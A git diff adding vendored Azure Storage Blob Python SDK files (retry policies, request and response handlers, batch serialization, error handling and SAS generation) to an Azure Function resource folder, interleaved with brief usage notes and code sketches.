+        # only match an already-created coroutine object, so async hooks
+        # would never be awaited.
+        if asyncio.iscoroutinefunction(settings['hook']):
+            await settings['hook'](
+                retry_count=settings['count'] - 1,
+                location_mode=settings['mode'],
+                **kwargs)
+        else:
+            settings['hook'](
+                retry_count=settings['count'] - 1,
+                location_mode=settings['mode'],
+                **kwargs)
+
+
+class AsyncStorageResponseHook(AsyncHTTPPolicy):
+
+    def __init__(self, **kwargs):  # pylint: disable=unused-argument
+        self._response_callback = kwargs.get('raw_response_hook')
+        super(AsyncStorageResponseHook, self).__init__()
+
+    async def send(self, request):
+        # type: (PipelineRequest) -> PipelineResponse
+        # Values could be 0
+        data_stream_total = request.context.get('data_stream_total')
+        if data_stream_total is None:
+            data_stream_total = request.context.options.pop('data_stream_total', None)
+        download_stream_current = request.context.get('download_stream_current')
+        if download_stream_current is None:
+            download_stream_current = request.context.options.pop('download_stream_current', None)
+        upload_stream_current = request.context.get('upload_stream_current')
+        if upload_stream_current is None:
+            upload_stream_current = request.context.options.pop('upload_stream_current', None)
+
+        response_callback = request.context.get('response_callback') or \
+            request.context.options.pop('raw_response_hook', self._response_callback)
+
+        response = await self.next.send(request)
+        await response.http_response.load_body()
+
+        will_retry = is_retry(response, request.context.options.get('mode'))
+        # Auth error could come from Bearer challenge, in which case this request will be made again
+        is_auth_error = response.http_response.status_code == 401
+        should_update_counts = not (will_retry or is_auth_error)
+
+        if should_update_counts and download_stream_current is not None:
+            download_stream_current += int(response.http_response.headers.get('Content-Length', 0))
+            if data_stream_total is None:
+                content_range = response.http_response.headers.get('Content-Range')
+                if content_range:
+                    data_stream_total = int(content_range.split(' ', 1)[1].split('/', 1)[1])
+                else:
+                    data_stream_total = download_stream_current
+        elif should_update_counts and upload_stream_current is not None:
+            upload_stream_current += int(response.http_request.headers.get('Content-Length', 0))
+        for pipeline_obj in [request, response]:
+            pipeline_obj.context['data_stream_total'] = data_stream_total
+            pipeline_obj.context['download_stream_current'] = download_stream_current
+            pipeline_obj.context['upload_stream_current'] = upload_stream_current
+        if response_callback:
+            if asyncio.iscoroutinefunction(response_callback):
+                await response_callback(response)
+            else:
+                response_callback(response)
+            request.context['response_callback'] = response_callback
+        return response
+
+class AsyncStorageRetryPolicy(StorageRetryPolicy):
+    """
+    The base class for Exponential and Linear retries containing shared code.
+    """
+
+    async def sleep(self, settings, transport):
+        backoff = self.get_backoff_time(settings)
+        if not backoff or backoff < 0:
+            return
+        await transport.sleep(backoff)
+
+    async def send(self, request):
+        retries_remaining = True
+        response = None
+        retry_settings = self.configure_retries(request)
+        while retries_remaining:
+            try:
+                response = await self.next.send(request)
+                if is_retry(response, retry_settings['mode']):
+                    retries_remaining = self.increment(
+                        retry_settings,
+                        request=request.http_request,
+                        response=response.http_response)
+                    if retries_remaining:
+                        await retry_hook(
+                            retry_settings,
+                            request=request.http_request,
+                            response=response.http_response,
+                            error=None)
+                        await self.sleep(retry_settings, request.context.transport)
+                        continue
+                break
+            except AzureError as err:
+                retries_remaining = self.increment(
+                    retry_settings, request=request.http_request, error=err)
+                if retries_remaining:
+                    await retry_hook(
+                        retry_settings,
+                        request=request.http_request,
+                        response=None,
+                        error=err)
+                    await self.sleep(retry_settings, request.context.transport)
+                    continue
+                raise err
+        if retry_settings['history']:
+            response.context['history'] = retry_settings['history']
+        response.http_response.location_mode = retry_settings['mode']
+        return response
+
+
+class ExponentialRetry(AsyncStorageRetryPolicy):
+    """Exponential retry."""
+
+    def __init__(self, initial_backoff=15, increment_base=3, retry_total=3,
+                 retry_to_secondary=False, random_jitter_range=3, **kwargs):
+        '''
+        Constructs an Exponential retry object. The initial_backoff is used for
+        the first retry. Subsequent retries are retried after initial_backoff +
+        increment_base^retry_count seconds. For example, by default the first retry
+        occurs after 15 seconds, the second after (15+3^1) = 18 seconds, and the
+        third after (15+3^2) = 24 seconds.
+
+        :param int initial_backoff:
+            The initial backoff interval, in seconds, for the first retry.
+        :param int increment_base:
+            The base, in seconds, to increment the initial_backoff by after the
+            first retry.
+        :param int retry_total:
+            The maximum number of retry attempts.
+        :param bool retry_to_secondary:
+            Whether the request should be retried to secondary, if able. This should
+            only be enabled if RA-GRS accounts are used and potentially stale data
+            can be handled.
+        :param int random_jitter_range:
+            A number in seconds which indicates a range to jitter/randomize for the back-off interval.
+            For example, a random_jitter_range of 3 results in the back-off interval x to vary between x+3 and x-3.
+        '''
+        self.initial_backoff = initial_backoff
+        self.increment_base = increment_base
+        self.random_jitter_range = random_jitter_range
+        super(ExponentialRetry, self).__init__(
+            retry_total=retry_total, retry_to_secondary=retry_to_secondary, **kwargs)
+
+    def get_backoff_time(self, settings):
+        """
+        Calculates how long to sleep before retrying.
+
+        :return:
+            A float indicating how long to wait before retrying the request,
+            or None to indicate no retry should be performed.
+        :rtype: float or None
+        """
+        random_generator = random.Random()
+        backoff = self.initial_backoff + (0 if settings['count'] == 0 else pow(self.increment_base, settings['count']))
+        random_range_start = backoff - self.random_jitter_range if backoff > self.random_jitter_range else 0
+        random_range_end = backoff + self.random_jitter_range
+        return random_generator.uniform(random_range_start, random_range_end)
+
+
+class LinearRetry(AsyncStorageRetryPolicy):
+    """Linear retry."""
+
+    def __init__(self, backoff=15, retry_total=3, retry_to_secondary=False, random_jitter_range=3, **kwargs):
+        """
+        Constructs a Linear retry object.
+
+        :param int backoff:
+            The backoff interval, in seconds, between retries.
+        :param int retry_total:
+            The maximum number of retry attempts.
+        :param bool retry_to_secondary:
+            Whether the request should be retried to secondary, if able. This should
+            only be enabled if RA-GRS accounts are used and potentially stale data
+            can be handled.
+        :param int random_jitter_range:
+            A number in seconds which indicates a range to jitter/randomize for the back-off interval.
+            For example, a random_jitter_range of 3 results in the back-off interval x to vary between x+3 and x-3.
+        """
+        self.backoff = backoff
+        self.random_jitter_range = random_jitter_range
+        super(LinearRetry, self).__init__(
+            retry_total=retry_total, retry_to_secondary=retry_to_secondary, **kwargs)
+
+    def get_backoff_time(self, settings):
+        """
+        Calculates how long to sleep before retrying.
+
+        :return:
+            A float indicating how long to wait before retrying the request,
+            or None to indicate no retry should be performed.
+        :rtype: float or None
+        """
+        random_generator = random.Random()
+        # the backoff interval normally does not change, however there is the possibility
+        # that it was modified by accessing the property directly after initializing the object
+        random_range_start = self.backoff - self.random_jitter_range \
+            if self.backoff > self.random_jitter_range else 0
+        random_range_end = self.backoff + self.random_jitter_range
+        return random_generator.uniform(random_range_start, random_range_end)
+
+
+class AsyncStorageBearerTokenCredentialPolicy(AsyncBearerTokenCredentialPolicy):
+    """ Custom Bearer token credential policy for following Storage Bearer challenges """
+
+    def __init__(self, credential, **kwargs):
+        # type: (AsyncTokenCredential, **Any) -> None
+        super(AsyncStorageBearerTokenCredentialPolicy, self).__init__(credential, STORAGE_OAUTH_SCOPE, **kwargs)
+
+    async def on_challenge(self, request, response):
+        # type: (PipelineRequest, PipelineResponse) -> bool
+        try:
+            auth_header = response.http_response.headers.get("WWW-Authenticate")
+            challenge = StorageHttpChallenge(auth_header)
+        except ValueError:
+            return False
+
+        scope = challenge.resource_id + DEFAULT_OAUTH_SCOPE
+        await self.authorize_request(request, scope, tenant_id=challenge.tenant_id)
+
+        return True
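The async policies mirror the sync ones; a sketch of the aio client with a response hook, which `AsyncStorageResponseHook` dispatches to (names and credential are placeholders):

```python
import asyncio

from azure.storage.blob.aio import BlobServiceClient


async def main():
    # raw_response_hook may be sync or async; it is awaited only when it is
    # a coroutine function.
    async def on_response(response):
        print("status:", response.http_response.status_code)

    async with BlobServiceClient(
        "https://myaccount.blob.core.windows.net",
        credential="<account-key>",
        raw_response_hook=on_response,
    ) as service:
        await service.get_account_information()

asyncio.run(main())
```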
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/request_handlers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/request_handlers.py
new file mode 100644
index 0000000..4ff4539
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/request_handlers.py
@@ -0,0 +1,278 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+
+from typing import (  # pylint: disable=unused-import
+    Union, Optional, Any, Iterable, Dict, List, Type, Tuple,
+    TYPE_CHECKING
+)
+
+import logging
+from os import fstat
+import stat
+from io import (SEEK_END, SEEK_SET, UnsupportedOperation)
+
+import isodate
+
+from azure.core.exceptions import raise_with_traceback
+
+
+_LOGGER = logging.getLogger(__name__)
+
+_REQUEST_DELIMITER_PREFIX = "batch_"
+_HTTP1_1_IDENTIFIER = "HTTP/1.1"
+_HTTP_LINE_ENDING = "\r\n"
+
+
+def serialize_iso(attr):
+    """Serialize Datetime object into ISO-8601 formatted string.
+
+    :param Datetime attr: Object to be serialized.
+    :rtype: str
+    :raises: ValueError if format invalid.
+    """
+    if not attr:
+        return None
+    if isinstance(attr, str):
+        attr = isodate.parse_datetime(attr)
+    try:
+        utc = attr.utctimetuple()
+        if utc.tm_year > 9999 or utc.tm_year < 1:
+            raise OverflowError("Hit max or min date")
+
+        date = "{:04}-{:02}-{:02}T{:02}:{:02}:{:02}".format(
+            utc.tm_year, utc.tm_mon, utc.tm_mday,
+            utc.tm_hour, utc.tm_min, utc.tm_sec)
+        return date + 'Z'
+    except (ValueError, OverflowError) as err:
+        msg = "Unable to serialize datetime object."
+        raise_with_traceback(ValueError, msg, err)
+    except AttributeError as err:
+        msg = "ISO-8601 object must be valid Datetime object."
+        raise_with_traceback(TypeError, msg, err)
+
+
+def get_length(data):
+    length = None
+    # Check if object implements the __len__ method, covers most input cases such as bytearray.
+    try:
+        length = len(data)
+    except:  # pylint: disable=bare-except
+        pass
+
+    if not length:
+        # Check if the stream is a file-like stream object.
+        # If so, calculate the size using the file descriptor.
+        try:
+            fileno = data.fileno()
+        except (AttributeError, UnsupportedOperation):
+            pass
+        else:
+            try:
+                mode = fstat(fileno).st_mode
+                if stat.S_ISREG(mode) or stat.S_ISLNK(mode):
+                    # st_size is only meaningful for regular files and symlinks;
+                    # other types, e.g. sockets, may return misleading sizes like 0.
+                    return fstat(fileno).st_size
+            except OSError:
+                # Not a valid fileno; possibly a socket number returned by a
+                # library such as requests.
+                pass
+
+        # If the stream is seekable and tell() is implemented, calculate the stream size.
+        try:
+            current_position = data.tell()
+            data.seek(0, SEEK_END)
+            length = data.tell() - current_position
+            data.seek(current_position, SEEK_SET)
+        except (AttributeError, OSError, UnsupportedOperation):
+            pass
+
+    return length
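Both helpers are pure functions, so their behavior is easy to pin down; the expected values below follow directly from the code above:

```python
import io
from datetime import datetime, timezone

# serialize_iso truncates to whole seconds and always appends 'Z'.
print(serialize_iso(datetime(2023, 5, 1, 12, 30, 15, tzinfo=timezone.utc)))
# -> '2023-05-01T12:30:15Z'

# get_length prefers __len__, then the file descriptor, then seek/tell.
print(get_length(b"abc"))    # 3, via len()
stream = io.BytesIO(b"abcdef")
stream.seek(2)
print(get_length(stream))    # 4, the remaining bytes, measured via seek/tell
print(stream.tell())         # 2, the position is restored afterwards
```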
+
+
+def read_length(data):
+    try:
+        if hasattr(data, 'read'):
+            read_data = b''
+            for chunk in iter(lambda: data.read(4096), b""):
+                read_data += chunk
+            return len(read_data), read_data
+        if hasattr(data, '__iter__'):
+            read_data = b''
+            for chunk in data:
+                read_data += chunk
+            return len(read_data), read_data
+    except:  # pylint: disable=bare-except
+        pass
+    raise ValueError("Unable to calculate content length, please specify.")
+
+
+def validate_and_format_range_headers(
+        start_range, end_range, start_range_required=True,
+        end_range_required=True, check_content_md5=False, align_to_page=False):
+    # If end range is provided, start range must be provided
+    if (start_range_required or end_range is not None) and start_range is None:
+        raise ValueError("start_range value cannot be None.")
+    if end_range_required and end_range is None:
+        raise ValueError("end_range value cannot be None.")
+
+    # Page ranges must be 512 aligned
+    if align_to_page:
+        if start_range is not None and start_range % 512 != 0:
+            raise ValueError("Invalid page blob start_range: {0}. "
+                             "The size must be aligned to a 512-byte boundary.".format(start_range))
+        if end_range is not None and end_range % 512 != 511:
+            raise ValueError("Invalid page blob end_range: {0}. "
+                             "The size must be aligned to a 512-byte boundary.".format(end_range))
+
+    # Format based on whether end_range is present
+    range_header = None
+    if end_range is not None:
+        range_header = 'bytes={0}-{1}'.format(start_range, end_range)
+    elif start_range is not None:
+        range_header = "bytes={0}-".format(start_range)
+
+    # Content MD5 can only be provided for a complete range less than 4MB in size
+    range_validation = None
+    if check_content_md5:
+        if start_range is None or end_range is None:
+            raise ValueError("Both start and end range required for MD5 content validation.")
+        if end_range - start_range > 4 * 1024 * 1024:
+            raise ValueError("Getting content MD5 for a range greater than 4MB is not supported.")
+        range_validation = 'true'
+
+    return range_header, range_validation
+
+
+def add_metadata_headers(metadata=None):
+    # type: (Optional[Dict[str, str]]) -> Dict[str, str]
+    headers = {}
+    if metadata:
+        for key, value in metadata.items():
+            headers['x-ms-meta-{}'.format(key.strip())] = value.strip() if value else value
+    return headers
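A quick illustration of the header mapping, following directly from `add_metadata_headers` above:

```python
print(add_metadata_headers({"category": "images", "owner": " alice "}))
# -> {'x-ms-meta-category': 'images', 'x-ms-meta-owner': 'alice'}
```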
+ """ + + if requests is None or len(requests) == 0: + raise ValueError('Please provide sub-request(s) for this batch request') + + delimiter_bytes = (_get_batch_request_delimiter(batch_id, True, False) + _HTTP_LINE_ENDING).encode('utf-8') + newline_bytes = _HTTP_LINE_ENDING.encode('utf-8') + batch_body = list() + + content_index = 0 + for request in requests: + request.headers.update({ + "Content-ID": str(content_index), + "Content-Length": str(0) + }) + batch_body.append(delimiter_bytes) + batch_body.append(_make_body_from_sub_request(request)) + batch_body.append(newline_bytes) + content_index += 1 + + batch_body.append(_get_batch_request_delimiter(batch_id, True, True).encode('utf-8')) + # final line of body MUST have \r\n at the end, or it will not be properly read by the service + batch_body.append(newline_bytes) + + return bytes().join(batch_body) + + +def _get_batch_request_delimiter(batch_id, is_prepend_dashes=False, is_append_dashes=False): + """ + Gets the delimiter used for this batch request's mixed/multipart HTTP format. + + :param str batch_id: + Randomly generated id + :param bool is_prepend_dashes: + Whether to include the starting dashes. Used in the body, but non on defining the delimiter. + :param bool is_append_dashes: + Whether to include the ending dashes. Used in the body on the closing delimiter only. + :return: The delimiter, WITHOUT a trailing newline. + """ + + prepend_dashes = '--' if is_prepend_dashes else '' + append_dashes = '--' if is_append_dashes else '' + + return prepend_dashes + _REQUEST_DELIMITER_PREFIX + batch_id + append_dashes + + +def _make_body_from_sub_request(sub_request): + """ + Content-Type: application/http + Content-ID: + Content-Transfer-Encoding: (if present) + + HTTP/ +
:
(repeated as necessary) + Content-Length: + (newline if content length > 0) + (if content length > 0) + + Serializes an http request. + + :param ~azure.core.pipeline.transport.HttpRequest sub_request: + Request to serialize. + :return: The serialized sub-request in bytes + """ + + # put the sub-request's headers into a list for efficient str concatenation + sub_request_body = list() + + # get headers for ease of manipulation; remove headers as they are used + headers = sub_request.headers + + # append opening headers + sub_request_body.append("Content-Type: application/http") + sub_request_body.append(_HTTP_LINE_ENDING) + + sub_request_body.append("Content-ID: ") + sub_request_body.append(headers.pop("Content-ID", "")) + sub_request_body.append(_HTTP_LINE_ENDING) + + sub_request_body.append("Content-Transfer-Encoding: binary") + sub_request_body.append(_HTTP_LINE_ENDING) + + # append blank line + sub_request_body.append(_HTTP_LINE_ENDING) + + # append HTTP verb and path and query and HTTP version + sub_request_body.append(sub_request.method) + sub_request_body.append(' ') + sub_request_body.append(sub_request.url) + sub_request_body.append(' ') + sub_request_body.append(_HTTP1_1_IDENTIFIER) + sub_request_body.append(_HTTP_LINE_ENDING) + + # append remaining headers (this will set the Content-Length, as it was set on `sub-request`) + for header_name, header_value in headers.items(): + if header_value is not None: + sub_request_body.append(header_name) + sub_request_body.append(": ") + sub_request_body.append(header_value) + sub_request_body.append(_HTTP_LINE_ENDING) + + # append blank line + sub_request_body.append(_HTTP_LINE_ENDING) + + return ''.join(sub_request_body).encode() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/response_handlers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/response_handlers.py new file mode 100644 index 0000000..570e82e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/response_handlers.py @@ -0,0 +1,195 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, Dict, List, Type, Tuple, + TYPE_CHECKING +) +import logging +from xml.etree.ElementTree import Element + +from azure.core.pipeline.policies import ContentDecodePolicy +from azure.core.exceptions import ( + HttpResponseError, + ResourceNotFoundError, + ResourceModifiedError, + ResourceExistsError, + ClientAuthenticationError, + DecodeError) + +from .parser import _to_utc_datetime +from .models import StorageErrorCode, UserDelegationKey, get_enum_value + +if TYPE_CHECKING: + from datetime import datetime + from azure.core.exceptions import AzureError + + +_LOGGER = logging.getLogger(__name__) + + +class PartialBatchErrorException(HttpResponseError): + """There is a partial failure in batch operations. + + :param str message: The message of the exception. + :param response: Server response to be deserialized. + :param list parts: A list of the parts in multipart response. 
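A sketch of what these helpers produce, driving them directly with azure.core's `HttpRequest`; the batch id is an arbitrary placeholder here, whereas the SDK generates a UUID:

```python
from azure.core.pipeline.transport import HttpRequest

reqs = [
    HttpRequest("DELETE", "/container/blob1"),
    HttpRequest("DELETE", "/container/blob2"),
]
body = serialize_batch_body(reqs, "00000000-0000-0000-0000-000000000000")
print(body.decode().splitlines()[0])
# -> '--batch_00000000-0000-0000-0000-000000000000'
```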
+ """ + + def __init__(self, message, response, parts): + self.parts = parts + super(PartialBatchErrorException, self).__init__(message=message, response=response) + + +def parse_length_from_content_range(content_range): + ''' + Parses the blob length from the content range header: bytes 1-3/65537 + ''' + if content_range is None: + return None + + # First, split in space and take the second half: '1-3/65537' + # Next, split on slash and take the second half: '65537' + # Finally, convert to an int: 65537 + return int(content_range.split(' ', 1)[1].split('/', 1)[1]) + + +def normalize_headers(headers): + normalized = {} + for key, value in headers.items(): + if key.startswith('x-ms-'): + key = key[5:] + normalized[key.lower().replace('-', '_')] = get_enum_value(value) + return normalized + + +def deserialize_metadata(response, obj, headers): # pylint: disable=unused-argument + raw_metadata = {k: v for k, v in response.http_response.headers.items() if k.startswith("x-ms-meta-")} + return {k[10:]: v for k, v in raw_metadata.items()} + + +def return_response_headers(response, deserialized, response_headers): # pylint: disable=unused-argument + return normalize_headers(response_headers) + + +def return_headers_and_deserialized(response, deserialized, response_headers): # pylint: disable=unused-argument + return normalize_headers(response_headers), deserialized + + +def return_context_and_deserialized(response, deserialized, response_headers): # pylint: disable=unused-argument + return response.http_response.location_mode, deserialized + + +def process_storage_error(storage_error): # pylint:disable=too-many-statements + raise_error = HttpResponseError + serialized = False + if not storage_error.response: + raise storage_error + # If it is one of those three then it has been serialized prior by the generated layer. 
+ if isinstance(storage_error, (PartialBatchErrorException, + ClientAuthenticationError, ResourceNotFoundError, ResourceExistsError)): + serialized = True + error_code = storage_error.response.headers.get('x-ms-error-code') + error_message = storage_error.message + additional_data = {} + error_dict = {} + try: + error_body = ContentDecodePolicy.deserialize_from_http_generics(storage_error.response) + try: + error_body = error_body or storage_error.response.reason + except AttributeError: + error_body = '' + # If it is an XML response + if isinstance(error_body, Element): + error_dict = { + child.tag.lower(): child.text + for child in error_body + } + # If it is a JSON response + elif isinstance(error_body, dict): + error_dict = error_body.get('error', {}) + elif not error_code: + _LOGGER.warning( + 'Unexpected return type %s from ContentDecodePolicy.deserialize_from_http_generics.', type(error_body)) + error_dict = {'message': str(error_body)} + + # If we extracted from a Json or XML response + if error_dict: + error_code = error_dict.get('code') + error_message = error_dict.get('message') + additional_data = {k: v for k, v in error_dict.items() if k not in {'code', 'message'}} + except DecodeError: + pass + + try: + # This check would be unnecessary if we have already serialized the error + if error_code and not serialized: + error_code = StorageErrorCode(error_code) + if error_code in [StorageErrorCode.condition_not_met, + StorageErrorCode.blob_overwritten]: + raise_error = ResourceModifiedError + if error_code in [StorageErrorCode.invalid_authentication_info, + StorageErrorCode.authentication_failed]: + raise_error = ClientAuthenticationError + if error_code in [StorageErrorCode.resource_not_found, + StorageErrorCode.cannot_verify_copy_source, + StorageErrorCode.blob_not_found, + StorageErrorCode.queue_not_found, + StorageErrorCode.container_not_found, + StorageErrorCode.parent_not_found, + StorageErrorCode.share_not_found]: + raise_error = ResourceNotFoundError + if error_code in [StorageErrorCode.account_already_exists, + StorageErrorCode.account_being_created, + StorageErrorCode.resource_already_exists, + StorageErrorCode.resource_type_mismatch, + StorageErrorCode.blob_already_exists, + StorageErrorCode.queue_already_exists, + StorageErrorCode.container_already_exists, + StorageErrorCode.container_being_deleted, + StorageErrorCode.queue_being_deleted, + StorageErrorCode.share_already_exists, + StorageErrorCode.share_being_deleted]: + raise_error = ResourceExistsError + except ValueError: + # Got an unknown error code + pass + + # Error message should include all the error properties + try: + error_message += "\nErrorCode:{}".format(error_code.value) + except AttributeError: + error_message += "\nErrorCode:{}".format(error_code) + for name, info in additional_data.items(): + error_message += "\n{}:{}".format(name, info) + + # No need to create an instance if it has already been serialized by the generated layer + if serialized: + storage_error.message = error_message + error = storage_error + else: + error = raise_error(message=error_message, response=storage_error.response) + # Ensure these properties are stored in the error instance as well (not just the error message) + error.error_code = error_code + error.additional_info = additional_data + # error.args is what's surfaced on the traceback - show error message in all cases + error.args = (error.message,) + try: + # `from None` prevents us from double printing the exception (suppresses generated layer error context) + exec("raise 
error from None") # pylint: disable=exec-used # nosec + except SyntaxError: + raise error + + +def parse_to_internal_user_delegation_key(service_user_delegation_key): + internal_user_delegation_key = UserDelegationKey() + internal_user_delegation_key.signed_oid = service_user_delegation_key.signed_oid + internal_user_delegation_key.signed_tid = service_user_delegation_key.signed_tid + internal_user_delegation_key.signed_start = _to_utc_datetime(service_user_delegation_key.signed_start) + internal_user_delegation_key.signed_expiry = _to_utc_datetime(service_user_delegation_key.signed_expiry) + internal_user_delegation_key.signed_service = service_user_delegation_key.signed_service + internal_user_delegation_key.signed_version = service_user_delegation_key.signed_version + internal_user_delegation_key.value = service_user_delegation_key.value + return internal_user_delegation_key diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/shared_access_signature.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/shared_access_signature.py new file mode 100644 index 0000000..f116890 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/shared_access_signature.py @@ -0,0 +1,230 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +from datetime import date + +from .parser import _str, _to_utc_datetime +from .constants import X_MS_VERSION +from . 
import sign_string, url_quote
+
+
+class QueryStringConstants(object):
+    SIGNED_SIGNATURE = 'sig'
+    SIGNED_PERMISSION = 'sp'
+    SIGNED_START = 'st'
+    SIGNED_EXPIRY = 'se'
+    SIGNED_RESOURCE = 'sr'
+    SIGNED_IDENTIFIER = 'si'
+    SIGNED_IP = 'sip'
+    SIGNED_PROTOCOL = 'spr'
+    SIGNED_VERSION = 'sv'
+    SIGNED_CACHE_CONTROL = 'rscc'
+    SIGNED_CONTENT_DISPOSITION = 'rscd'
+    SIGNED_CONTENT_ENCODING = 'rsce'
+    SIGNED_CONTENT_LANGUAGE = 'rscl'
+    SIGNED_CONTENT_TYPE = 'rsct'
+    START_PK = 'spk'
+    START_RK = 'srk'
+    END_PK = 'epk'
+    END_RK = 'erk'
+    SIGNED_RESOURCE_TYPES = 'srt'
+    SIGNED_SERVICES = 'ss'
+    SIGNED_OID = 'skoid'
+    SIGNED_TID = 'sktid'
+    SIGNED_KEY_START = 'skt'
+    SIGNED_KEY_EXPIRY = 'ske'
+    SIGNED_KEY_SERVICE = 'sks'
+    SIGNED_KEY_VERSION = 'skv'
+
+    # for blob only
+    SIGNED_ENCRYPTION_SCOPE = 'ses'
+
+    # for ADLS
+    SIGNED_AUTHORIZED_OID = 'saoid'
+    SIGNED_UNAUTHORIZED_OID = 'suoid'
+    SIGNED_CORRELATION_ID = 'scid'
+    SIGNED_DIRECTORY_DEPTH = 'sdd'
+
+    @staticmethod
+    def to_list():
+        return [
+            QueryStringConstants.SIGNED_SIGNATURE,
+            QueryStringConstants.SIGNED_PERMISSION,
+            QueryStringConstants.SIGNED_START,
+            QueryStringConstants.SIGNED_EXPIRY,
+            QueryStringConstants.SIGNED_RESOURCE,
+            QueryStringConstants.SIGNED_IDENTIFIER,
+            QueryStringConstants.SIGNED_IP,
+            QueryStringConstants.SIGNED_PROTOCOL,
+            QueryStringConstants.SIGNED_VERSION,
+            QueryStringConstants.SIGNED_CACHE_CONTROL,
+            QueryStringConstants.SIGNED_CONTENT_DISPOSITION,
+            QueryStringConstants.SIGNED_CONTENT_ENCODING,
+            QueryStringConstants.SIGNED_CONTENT_LANGUAGE,
+            QueryStringConstants.SIGNED_CONTENT_TYPE,
+            QueryStringConstants.START_PK,
+            QueryStringConstants.START_RK,
+            QueryStringConstants.END_PK,
+            QueryStringConstants.END_RK,
+            QueryStringConstants.SIGNED_RESOURCE_TYPES,
+            QueryStringConstants.SIGNED_SERVICES,
+            QueryStringConstants.SIGNED_OID,
+            QueryStringConstants.SIGNED_TID,
+            QueryStringConstants.SIGNED_KEY_START,
+            QueryStringConstants.SIGNED_KEY_EXPIRY,
+            QueryStringConstants.SIGNED_KEY_SERVICE,
+            QueryStringConstants.SIGNED_KEY_VERSION,
+            # for blob only
+            QueryStringConstants.SIGNED_ENCRYPTION_SCOPE,
+            # for ADLS
+            QueryStringConstants.SIGNED_AUTHORIZED_OID,
+            QueryStringConstants.SIGNED_UNAUTHORIZED_OID,
+            QueryStringConstants.SIGNED_CORRELATION_ID,
+            QueryStringConstants.SIGNED_DIRECTORY_DEPTH,
+        ]
+
+
+class SharedAccessSignature(object):
+    '''
+    Provides a factory for creating account access
+    signature tokens with an account name and account key. Users can either
+    use the factory or can construct the appropriate service and use the
+    generate_*_shared_access_signature method directly.
+    '''
+
+    def __init__(self, account_name, account_key, x_ms_version=X_MS_VERSION):
+        '''
+        :param str account_name:
+            The storage account name used to generate the shared access signatures.
+        :param str account_key:
+            The access key to generate the shared access signatures.
+        :param str x_ms_version:
+            The service version used to generate the shared access signatures.
+        '''
+        self.account_name = account_name
+        self.account_key = account_key
+        self.x_ms_version = x_ms_version
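`generate_account` below is reached through the public `generate_account_sas` helper; a sketch, with the account name and key as placeholders:

```python
from datetime import datetime, timedelta, timezone

from azure.storage.blob import (
    AccountSasPermissions,
    ResourceTypes,
    generate_account_sas,
)

sas = generate_account_sas(
    account_name="myaccount",
    account_key="<account-key>",
    resource_types=ResourceTypes(container=True, object=True),
    permission=AccountSasPermissions(read=True, list=True),
    expiry=datetime.now(timezone.utc) + timedelta(hours=1),
)
# sas is the query string assembled by _SharedAccessHelper.get_token(),
# e.g. 'se=...&sp=rl&sv=...&ss=b&srt=co&sig=...'
```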
+    def generate_account(self, services, resource_types, permission, expiry, start=None,
+                         ip=None, protocol=None, **kwargs):
+        '''
+        Generates a shared access signature for the account.
+        Use the returned signature with the sas_token parameter of a service
+        client, or to create a new account object.
+
+        :param Services services:
+            Specifies the services accessible with the account SAS.
+        :param ResourceTypes resource_types:
+            Specifies the resource types that are accessible with the account
+            SAS. You can combine values to provide access to more than one
+            resource type.
+        :param AccountSasPermissions permission:
+            The permissions associated with the shared access signature. The
+            user is restricted to operations allowed by the permissions.
+            Required unless an id is given referencing a stored access policy
+            which contains this field. This field must be omitted if it has been
+            specified in an associated stored access policy. You can combine
+            values to provide more than one permission.
+        :param expiry:
+            The time at which the shared access signature becomes invalid.
+            Required unless an id is given referencing a stored access policy
+            which contains this field. This field must be omitted if it has
+            been specified in an associated stored access policy. Azure will always
+            convert values to UTC. If a date is passed in without timezone info, it
+            is assumed to be UTC.
+        :type expiry: datetime or str
+        :param start:
+            The time at which the shared access signature becomes valid. If
+            omitted, start time for this call is assumed to be the time when the
+            storage service receives the request. Azure will always convert values
+            to UTC. If a date is passed in without timezone info, it is assumed to
+            be UTC.
+        :type start: datetime or str
+        :param str ip:
+            Specifies an IP address or a range of IP addresses from which to accept requests.
+            If the IP address from which the request originates does not match the IP address
+            or address range specified on the SAS token, the request is not authenticated.
+            For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS
+            restricts the request to those IP addresses.
+        :param str protocol:
+            Specifies the protocol permitted for a request made with the SAS. The default value
+            is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values.
